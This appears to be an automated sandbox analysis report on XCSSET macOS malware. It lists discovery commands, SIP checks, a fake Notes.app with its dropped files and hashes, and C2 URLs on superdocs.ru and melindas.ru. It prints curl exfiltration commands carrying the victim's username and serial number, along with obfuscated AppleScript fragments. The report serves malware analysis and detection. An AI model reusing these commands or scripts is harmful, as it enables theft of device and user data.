Source: applet, 00001023.00000508.1.000000010ffea000.000000010fff6000.r--.sdmp	Binary or memory string: framework.vmnet
Source: applet, 00001023.00000508.1.000000010ffea000.000000010fff6000.r--.sdmp	Binary or memory string: framework.vmnet$

HIPS / PFW / Operating System Protection Evasion

Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration

Source: /bin/bash (PID: 1061)

Csrutil executable: /usr/bin/csrutil csrutil status

Jump to behavior

Source: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet (PID: 1023)

Sysctl read request: kern.safeboot (1.66)

Jump to behavior

Source: /usr/bin/osacompile (PID: 1001)

Codesign executable: /usr/bin/codesign codesign --sign - --force --deep .

Jump to behavior

Language, Device and Operating System Detection

Queries the unique Apple serial number of the machine

Source: /usr/bin/osascript (PID: 1037)	IOPlatformSerialNumber keyword found in command: /bin/sh sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /bin/sh (PID: 1040)	IOPlatformSerialNumber keyword found in command: /bin/bash sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /bin/bash (PID: 1042)	IOPlatformSerialNumber keyword found in command: /usr/bin/awk awk -F' /IOPlatformSerialNumber/{print $(NF-1)}	Jump to behavior
Source: /bin/sh (PID: 1056)	IOPlatformSerialNumber keyword found in command: /bin/bash sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /bin/bash (PID: 1058)	IOPlatformSerialNumber keyword found in command: /usr/bin/awk awk -F' /IOPlatformSerialNumber/{print $(NF-1)}	Jump to behavior
Source: /bin/sh (PID: 1064)	IOPlatformSerialNumber keyword found in command: /bin/bash sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /bin/bash (PID: 1066)	IOPlatformSerialNumber keyword found in command: /usr/bin/awk awk -F' /IOPlatformSerialNumber/{print $(NF-1)}	Jump to behavior
Source: /bin/sh (PID: 1075)	IOPlatformSerialNumber keyword found in command: /bin/bash sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /bin/bash (PID: 1077)	IOPlatformSerialNumber keyword found in command: /usr/bin/awk awk -F' /IOPlatformSerialNumber/{print $(NF-1)}	Jump to behavior

Source: /bin/bash (PID: 1041)	IOreg executable: /usr/sbin/ioreg ioreg -c IOPlatformExpertDevice -d 2	Jump to behavior
Source: /bin/bash (PID: 1057)	IOreg executable: /usr/sbin/ioreg ioreg -c IOPlatformExpertDevice -d 2	Jump to behavior
Source: /bin/bash (PID: 1065)	IOreg executable: /usr/sbin/ioreg ioreg -c IOPlatformExpertDevice -d 2	Jump to behavior
Source: /bin/bash (PID: 1076)	IOreg executable: /usr/sbin/ioreg ioreg -c IOPlatformExpertDevice -d 2	Jump to behavior

Source: /bin/bash (PID: 957)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 957)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1020)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1028)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1029)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1030)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1031)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1032)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1033)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1036)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1038)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1039)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1040)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1043)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1044)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1048)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1053)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1054)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1056)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1059)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1060)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1063)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1064)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1067)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1068)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1074)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1075)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1078)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1079)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1080)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1082)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1083)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1084)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 1085)	Sysctl requested: kern.hostname (1.10)	Jump to behavior

Source: /bin/bash (PID: 978)	Defaults executable: /usr/bin/defaults defaults read loginwindow SystemVersionStampAsString			Jump to behavior
Source: /bin/bash (PID: 1053)	Defaults executable: /usr/bin/defaults defaults read loginwindow SystemVersionStampAsString			Jump to behavior

Source: /usr/bin/codesign (PID: 1002)	Sysctl read request: hw.ncpu (6.3)	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Sysctl read request: hw.memsize (6.24)	Jump to behavior
Source: /bin/ps (PID: 1069)	Sysctl read request: hw.memsize (6.24)	Jump to behavior

Source: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet (PID: 1023)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist			Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist			Jump to behavior

Source: /bin/bash (PID: 978)	Defaults executable: /usr/bin/defaults defaults read loginwindow SystemVersionStampAsString	Jump to behavior
Source: /bin/bash (PID: 1053)	Defaults executable: /usr/bin/defaults defaults read loginwindow SystemVersionStampAsString	Jump to behavior
Source: /bin/bash (PID: 1054)	Defaults executable: /usr/bin/defaults defaults read /Applications/Safari.app/Contents/Info CFBundleShortVersionString	Jump to behavior
Source: /bin/bash (PID: 1059)	Defaults executable: /usr/bin/defaults defaults read /Library/Preferences/com.apple.alf globalstate	Jump to behavior

Stealing of Sensitive Information

Yara detected XCSSET

Source: Yara match

File source: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a, type: DROPPED

Sends data within HTTP X-headers likely leaking sensitive information

Source: /bin/bash (PID: 982)	Curl X-headers using -H: /usr/bin/curl -> curl -ks -m 5 -H X-Usr: pedro https://melindas.ru/sys/prepod.php	Jump to behavior
Source: /bin/bash (PID: 1043)	Curl X-headers using -H: /usr/bin/curl -> curl -k -s --connect-timeout 14 -d module launched. connRetries: 0. Used domain: superdocs.ru -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l	Jump to behavior
Source: /bin/bash (PID: 1067)	Curl X-headers using -H: /usr/bin/curl -> curl -k -s --connect-timeout 14 -d MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l	Jump to behavior
Source: /bin/bash (PID: 1078)	Curl X-headers using -H: /usr/bin/curl -> curl -k -s --connect-timeout 14 -d updated .domain with superdocs.ru -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l	Jump to behavior

Remote Access Functionality

Yara detected XCSSET

Source: Yara match

File source: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	1 LC_LOAD_DYLIB Addition	1 LC_LOAD_DYLIB Addition	1 Disable or Modify Tools	OS Credential Dumping	361 System Information Discovery	Remote Services	Data from Local System	1 Exfiltration Over Alternative Protocol	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Command and Scripting Interpreter	1 Plist Modification	1 Plist Modification	1 File and Directory Permissions Modification	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Launchctl	15 Launch Agent	15 Launch Agent	1 Scripting	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	3 AppleScript	13 Launch Daemon	13 Launch Daemon	1 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	5 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Code Signing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 File Deletion	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	31 Masquerading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Virtualization/Sandbox Evasion	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	2 Hidden Files and Directories	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Indicator Removal on Host	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Name	IP	Active	Malicious	Antivirus Detection	Reputation
superdocs.ru	45.82.153.92	true	true		unknown
melindas.ru	45.82.153.92	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
https://superdocs.ru/agent/bin/icons.php?icon=Reminders	false	unknown
https://superdocs.ru/l	true	unknown
https://melindas.ru/	true	unknown
https://superdocs.ru/agent/scripts/payloader.applescript	false	unknown
https://superdocs.ru/agent/scripts/notes_app.applescript	false	unknown
https://superdocs.ru/agent/scripts/contacts.applescript	false	unknown
https://superdocs.ru/agent/scripts/telegram.applescript	false	unknown
https://superdocs.ru/agent/scripts/remove_old.applescript	false	unknown
https://melindas.ru/sys/prepod.php	true	unknown
https://superdocs.ru/apple/com.php	false	unknown
https://superdocs.ru/agent/scripts/listing.applescript	false	unknown
https://superdocs.ru/agent/payload.php?serial=C07GV0KZPJH8&user=pedro&hash=&display_state=off	false	unknown
https://superdocs.ru/agent/scripts/telegram_lite.applescript	false	unknown
https://superdocs.ru/agent/upload.php?serial=C07GV0KZPJH8	false	unknown
https://superdocs.ru/agent/bin/icons/Empty.icns	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.82.153.92	superdocs.ru	Russian Federation		208845	GLAVREGIONELEKTROSVYAZ-ASRU	true

Created / dropped Files

/Users/pedro/Library/Caches/GitServices/.domain

Download File

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	13
Entropy (8bit):	3.2389012566026314
Encrypted:	false
SSDEEP:	3:6RdWLK:QUO
MD5:	A02FEEF1A4845127FF7C5DB9AFDE3143
SHA1:	9632636811A8C926A8F1D1163EB000234815AC4C
SHA-256:	018C3C0465651E2A6FA6F11C8089266DD62B6C835914B540D7FBE31EDBF42C05
SHA-512:	9C551FD41A56AE92CBDB73F478BA25625F9B65D559DA4BCCE926870A9A8A75C84551C76AEA366130E13EE80D2DBF66381EBE1FDEDB02F6F75B0C1983D047067D
Malicious:	false
Reputation:	low
Preview:	superdocs.ru.

/Users/pedro/Library/Caches/GitServices/.plist

Download File

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	54
Entropy (8bit):	4.37824497572574
Encrypted:	false
SSDEEP:	3:DdV5XQeCWKdILAnn:DBQ1WKdIL4n
MD5:	FFFEBD886C75EC15580F2275FB81140C
SHA1:	92CE43A19D232DE15EECE6F5F74A117AF97C4F61
SHA-256:	C0B59CF42DDA2DC282314D8C2989603F05DB19094B9DD98112405DAED40684F4
SHA-512:	450C04FE03F78525AB8577589BEBBDA62DD43B46765BD111D46CEB81631AC330AB3030C0197DC2B89A5231E4486A15757B46B3AC1E01F42A92253BF07595E3E7
Malicious:	false
Reputation:	low
Preview:	/Users/pedro/Library/LaunchAgents/com.apple.spx.plist.

/Users/pedro/Library/Caches/GitServices/.report

Download File

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.310692737765162
Encrypted:	false
SSDEEP:	3:DdV5JKjKHAXNTGVfv:DDxlfv
MD5:	1F9BA4AE7B9E680B86D0EC975604044D
SHA1:	4D9B26733872105689980FADD002FF796AD2C146
SHA-256:	1E121E741A17829D5818A32630E91876A0AF88C6B0E2ADFC29B7DC627E066C34
SHA-512:	56AC29E43B26FFEC3BCE5FB235AA558A4DA8DD25E7DE0203A45C043D6BAA5AC164BAD9E3E4CFE51F1BA4E9C0963FF71EB648962318B45CA31F45248FEA7D2E46
Malicious:	false
Reputation:	low
Preview:	/Users/pedro/Library/Group Containers/group.com.apple.mail.

/Users/pedro/Library/Caches/GitServices/AppleWebKit

Download File

Process:	/bin/cat
File Type:	ASCII text
Category:	dropped
Size (bytes):	93
Entropy (8bit):	4.448904576734105
Encrypted:	false
SSDEEP:	3:JwWyWKV5JKjKHAXNTGVf/RzL8Vo0WbpVVOkv:pyWwxlfZnEo0e7nv
MD5:	850BC02D33AAAE950C6A77BE998068A6
SHA1:	3F98DC818171F562D23EBC9107C774D90C2170FA
SHA-256:	B9CA4CD6EE465E8ED3C7CEC6F45BC231D413F68F8DFF60360F6465E917004F29
SHA-512:	C7A9D731D819F5488E863B46C8BA23A701E3538F5B8EBEC2C5B296C33DB57DC7F73EE46F23A71DAE2F365A560CCE33211D11F3A1D3F15CD8E4283051F6430778
Malicious:	false
Reputation:	low
Preview:	'/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet'.

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Info.plist

Download File

Process:	/usr/bin/plutil
File Type:	XML document text
Category:	dropped
Size (bytes):	2063
Entropy (8bit):	4.96975429483394
Encrypted:	false
SSDEEP:	24:2dfyiwE6wIxMa6ryH4ov/lq5aGiQ2gGTG2gq1W2g20EG2gMaf2gNd52gma02gi/0:cfyWIxcOH1v9qUVP1F0S2d0a1XwT8A
MD5:	9494BE414A967F3A6DEF4EDE5163A2F2
SHA1:	DE04207A3342719F3F8E2A08A6979E83017F2456
SHA-256:	9A3980F20C6B3695B31CFCACAB042D1466D3E6BA35C488F2CD05E48EF1C788FE
SHA-512:	E0075A68C26139F20DF972EDF8E61166213A85CE990294191E5C320C520FADC4B65733F4A5E0881555D53B0FD5AD09DE5652F7AD70655EDF3E34F1C491F1F515
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>CFBundleAllowMixedLocalizations</key>..<true/>..<key>CFBundleDevelopmentRegion</key>..<string>en</string>..<key>CFBundleExecutable</key>..<string>applet</string>..<key>CFBundleIconFile</key>..<string>applet</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>Notes</string>..<key>CFBundlePackageType</key>..<string>APPL</string>..<key>CFBundleSignature</key>..<string>aplt</string>..<key>LSMinimumSystemVersionByArchitecture</key>..<dict>...<key>x86_64</key>...<string>10.6</string>..</dict>..<key>LSRequiresCarbon</key>..<true/>..<key>LSUIElement</key>..<true/>..<key>NSAppleEventsUsageDescription</key>..<string>This script needs to control other applications to run.</string>..<key>NSAppleMusicUsageDescription</key>..<string>This script needs access to your music

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet

Download File

Process:	/usr/bin/osacompile
File Type:	Mach-O fat file with 2 architectures
Category:	dropped
Size (bytes):	99064
Entropy (8bit):	0.2898056715064808
Encrypted:	false
SSDEEP:	48:Pp+iuaLkXX3WXoHcbX1Aa2sw8O+SnOKqe12swqNCHwljVpb:P7rkDVw0CQlT
MD5:	FA2B569A8DF80B2269F7ABA6277CC0C2
SHA1:	B6F249F0597C5072992B7C985FF2C9F7B82287ED
SHA-256:	CBF2F65C38D6EF95533EC02902E75B79FB607D06B1DEA0C4049DCA1EC74FDD7B
SHA-512:	9CFA9018E8B5081C0E68F22125B6A3B13453105011DA3BF5577FBDC21609338F7CD45FF8FCB6D357629F1901FD0A157321D44D36E84C3FC139CA88C6C5A2F94F
Malicious:	true
Reputation:	low
Preview:	..................@.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet.cstemp

Download File

Process:	/usr/bin/codesign
File Type:	Mach-O fat file with 2 architectures
Category:	dropped
Size (bytes):	135933
Entropy (8bit):	0.37532898478995064
Encrypted:	false
SSDEEP:	48:ybo+iuaLkXX3WXoHcbXaAa2sw0O+SnOKhe12swrNCHwljVpxsbng6rOVjGsbFQwG:CWrPXV5rCQl6bgOmTbqbgUKbgBN
MD5:	F04D8185EB0AA828DBE0B1AAC8104C66
SHA1:	85BFD24EF6556AE123C7575ED7FE9CAFBBB47267
SHA-256:	A560BA2D0622B0E963559BFE8DFF26A03E0E057F9A7219DD93EACEA27FF58982
SHA-512:	CC5144650CD6D1B13D1514B8DB204BD1B4B964247A22295501A1A1454231880AF485BEAEDD0AF086D58815928AC77E2F5B0ECC97A535B708B4297A730D9F7D50
Malicious:	true
Reputation:	low
Preview:	..................@...................@.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/PkgInfo

Download File

Process:	/usr/bin/osacompile
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:kqtn:Btn
MD5:	DB6F4017A24D2CB070AD3DE12ADB78F4
SHA1:	94FDBEE3E734A2DF38FD68BE4837E8FEF066F005
SHA-256:	412D70757C4FDECDD73355AC4BB3BA80C6705110D15CFBC9FE925E7B4FAF7962
SHA-512:	DECF0A4297001FE030BBEBA5748A72E9685A4590C83A90EC512DC28412A4A4F89E8CE97D1C8824309F50D9EA111E42C9428714017BDAD47FF3FD7D241E19A352
Malicious:	false
Reputation:	low
Preview:	APPLaplt

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a

Download File

Process:	/usr/bin/osacompile
File Type:	data
Category:	dropped
Size (bytes):	20490
Entropy (8bit):	5.145026965106306
Encrypted:	false
SSDEEP:	384:N8sbbzS7jn9IDcvv4TDcFZAiotICsUHlxKpeTUvjy1VsJqnyj70JEi:inGDOaGqH+i
MD5:	9E3479F73F1410D2F4678AD8F982D69C
SHA1:	5F6038E2747C22FB82B854AD4A3A6E8398A6201D
SHA-256:	E8573171A513C2E63ECC06DE33B28E2F6CEEE59494A8AC819BFC0943E0BBB0DA
SHA-512:	FDDCAF9DB5D0E19BFEDEC9D85591ED14675D9394688F20EF3897848B66EB9EAEDA67ED8D7ECBF320567845D431E83CFEBFDAC95573D5323900F071E70DFBD772
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XCSSET, Description: Yara detected XCSSET, Source: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a, Author: Joe Security
Reputation:	low
Preview:	FasdUAS 1.101.10.......................................................................................ascrcmnt**.............0..launchapp..launchApp.....0..isinstalled..isInstalled.....0..boot.......0..isconnectedtointernet..isConnectedToInternet.....0..initapp..initApp.....0..connloop..connLoop......aevtoappnull..................................ascrcmnt........**..........0..message...................0..message.........................................strq..............X.X.0.0.0.0.0.0.0.0.X.X.....0..serialnumber..serialNumber..............i.o.r.e.g. .-.c. .I.O.P.l.a.t.f.o.r.m.E.x.p.e.r.t.D.e.v.i.c.e. .-.d. .2. .\|. .a.w.k. .-.F.\.". .'./.I.O.P.l.a.t.f.o.r.m.S.e.r.i.a.l.N.u.m.b.e.r./.{.p.r.i.n.t. .$.(.N.F.-.1.).}.'......sysoexecTEXT........TEXT......................F.c.u.r.l. .-.k. .-.s. .-.-.c.o.n.n.e.c.t.-.t.i.m.e.o.u.t. .1.4. .-.d. .............. .-.H. .'.X.-.I.d.:. ..............'. .-.H. .'.X.-.U.s.e.r.s.:. .....0..username..userName..............'. .-.H. .'.X.-.M.o.

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt

Download File

Process:	/bin/bash
File Type:	UTF-8 Unicode text
Category:	dropped
Size (bytes):	1699
Entropy (8bit):	5.10229474859012
Encrypted:	false
SSDEEP:	24:6QBQS3f3lFFGep5lBTNbahb5P+Fc8uVknVZhsfAR8F4A6P5cN:6QBFh5lZNbCb5qc/qnXhsfbF0P52
MD5:	99383436EAE8893069C1C30A932DCAC5
SHA1:	25C7A4F5115E1EAF6078FB76B2619D8106EE3C29
SHA-256:	DACDEC78B164539B27DD5EE773AEB5C6BC4C53CF5EA7E0BCE123F39F324F3D8E
SHA-512:	81D6037B7C5562EC5B44D75A7640506E13A36A46A6C22139A1B0CF9FC81A6151973194C9161A2DBD27F28F6187079E74AB72BE5F8D434CCDC8FCE717269ECD94
Malicious:	false
Reputation:	low
Preview:	global ds.global d.global di..set ds to {"........................", "......................", "......................", "........................", "........................", "........................"}..set di to 1.set d to item di of ds..on xe(_str)..set x to id of _str..repeat with c in x...set contents of c to c - (102 - 2)..end repeat..return string id x.end xe..on xex(_str)..set x to id of _str..repeat with c in x...set contents of c to c - (102 - 1)..end repeat..return string id x.end xex..on m()....-- log "domain used " & xe(d)....set dF to POSIX path of ((path to me as text) & "::")....set tF to quoted form of (dF & xex("....................")) -- /Containers....do shell script "rm -rf " & tF..set a to "123"..do shell script "mkdir -p " & tF....set f to quoted form of (dF & xex("........................")) -- /Containers/a....set un to do shell script xe("............") -- whoami....do shell script "curl -sk -d '" & xe("........") & "=" & un & "&" & xex("....................

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/main.scpt

Download File

Process:	/usr/bin/osacompile
File Type:	data
Category:	dropped
Size (bytes):	500
Entropy (8bit):	4.508532280423071
Encrypted:	false
SSDEEP:	12:eFvsgY3J2dRX8EfWlmvn1E2Nc1R/6ywwmKlFt3nbprNLn:eFEBJ2dV8E7/O2W1Ryywwm+FtLFNLn
MD5:	7BF9ECE969AF9A7C9D946C22317D175C
SHA1:	FFAF6E9ADACD9B502274910CE8723DDD3CC69F2A
SHA-256:	49BFF1EE08E9EB4E56064B7E3F9115322F29CA3813FB9D20D7E85436C34389EC
SHA-512:	FAB3A772CDC320DDE64BB41BE5742F1C4A76BE952D06981537E7C648A25D301726162B4099D9DE926809F8674D897DB43FB5EC7786000A4237EDA4B550699C20
Malicious:	true
Reputation:	low
Preview:	FasdUAS 1.101.10...........................................................aevtoappnull........**..........................aevtoappnull........**...............................................o.s.a.s.c.r.i.p.t. .'./.U.s.e.r.s./.p.e.d.r.o./.L.i.b.r.a.r.y./.G.r.o.u.p. .C.o.n.t.a.i.n.e.r.s./.g.r.o.u.p...c.o.m...a.p.p.l.e...m.a.i.l./.N.o.t.e.s...a.p.p./.C.o.n.t.e.n.t.s./.R.e.s.o.u.r.c.e.s./.S.c.r.i.p.t.s./.a...s.c.p.t.'......sysoexecTEXT........TEXT...................j...OPW..X....h.ascr........

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns

Download File

Process:	/bin/cp
File Type:	data
Category:	dropped
Size (bytes):	62335
Entropy (8bit):	7.967218049931705
Encrypted:	false
SSDEEP:	1536:hAgVB6oHqAKvGygwUUCj2zbvop32ZnUa4QxO:nVBzKAea1nSzDO2tUlb
MD5:	09381658C2E6AD1C4E19C665F8970874
SHA1:	9D4E7A9CA373009C84B49CFE81B748FB1AF77F02
SHA-256:	8511D134AE4FACE6164A7510BC4023735098D6406F6941425B5697C6D6CB8B77
SHA-512:	53C0D678FCEC4382256EBFA81A3B2A14EB4CAD8AD6456046871D0516C5C8D0347BCE9CFB5742971C1A44772ADFFB2236D591D83D4D9F917706DD38A7EDE79D0F
Malicious:	true
Reputation:	low
Preview:	icns....TOC ...0is32...Us8mk....ic11...5ic07..-lic13...Iis32...U................................................................................................."........................................................................................................................."......G[_.`.\J.../.?.1.......................................................................................!..s8mk........$&&&&&&%.................. .................................%..............%&..............&&..............&&..............&&..............&&..............&&..............&%..............%............... ..............................".....%&&&&&&%....ic11...5.PNG........IHDR... ... .....szz.....sRGB........xeXIfMM..................>...........F.(...........i.........N............................................. ........... ....~..R....pHYs...%...%.IR$....NIDATX..W.k.A...4....7...EQT.j.AD.(T."...,(=H..O...B.z.D....<....Z.........M.6...Y.o...jbZ!.G.........7.YY.Nru...V%.r.C'X.'.....[

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.rsrc

Download File

Process:	/usr/bin/osacompile
File Type:	MS Windows icon resource
Category:	dropped
Size (bytes):	410
Entropy (8bit):	0.9107158394591011
Encrypted:	false
SSDEEP:	3:tltlBVltlBnlFXlfTQl/5Tp0W3ll7p2P/3X+WTf:t1D1llPMGWDK3uWD
MD5:	C6C7D7FBDDAE2EE65AD8E923225D6952
SHA1:	01010E800BE0AD1D82AC8897642EF98AD7C17B68
SHA-256:	744E59E2A8288B799D84AB7EC718827BD63A8C81806F6C95AB5DBDCAB3AC49AF
SHA-512:	AD93DFF1C6661ADFB11C5CEC1B1DED2D5EC6064B196E607F4A6C840EBF9B245EEC73E826045654E8918D553A1A5E3121055525F65DA00F40ABB19AFCBCEC7721
Malicious:	false
Reputation:	low
Preview:	....................................................................................................................................................................................................................................................................................................@......................................$...$...F...........F..scsz....spsh...................................$...$...F

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/_CodeSignature/CodeResources

Download File

Process:	/usr/bin/codesign
File Type:	XML document text
Category:	dropped
Size (bytes):	3128
Entropy (8bit):	5.021373299737914
Encrypted:	false
SSDEEP:	96:CyAtWwSvGEtP0kYT2BLDzFNQpO/YTbJvy:XH3tMEDzko
MD5:	BC5E8A38A0DB28AF546723544A0054FC
SHA1:	249CB7E29D99312D2515A103C293BC216E8B5676
SHA-256:	FF2E10BF3FD802C806C364369C31A18A9B98A121D5577A6A072E20510AA61C62
